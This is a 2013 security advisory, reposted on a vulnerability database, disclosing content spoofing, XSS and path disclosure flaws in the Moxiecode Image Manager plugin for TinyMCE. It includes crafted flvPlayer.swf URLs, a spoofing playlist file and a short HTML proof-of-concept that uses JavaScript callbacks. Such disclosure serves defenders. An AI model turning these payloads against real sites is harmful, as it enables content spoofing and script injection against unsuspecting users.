Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29740
HistorySep 09, 2013 - 12:00 a.m.

CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE

2013-09-0900:00:00
vulners.com
36

Hello 3APA3A!

I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle.

These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure vulnerabilities. About Content Spoofing and Cross-Site Scripting vulnerabilities in flvPlayer I informed developer already in October 2011 (it was part of Media plugin for TinyMCE) and disclosed them in November. After my informing he fixed these holes in November 2011 in Media plugin. But he forgot to fix them in MCImageManager plugin.


Affected products:

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.


Affected vendors:

Moxiecode
http://www.moxiecode.com


Details:

Content Spoofing (WASC-12):

Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg

Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses).

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

If at the site at page with flvPlayer.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.

Example of exploit:

<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash&quot; type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Full Path Disclosure (WASC-13):

Full path In cookies MCManager_im_lastPath and MCManagerHistoryCookie_im.


Timeline:

2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE (which bundled with flvPlayer in Media plugin).
2013.06.11 - announced at my site.
2013.06.13 - informed developer of MCImageManager.
2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua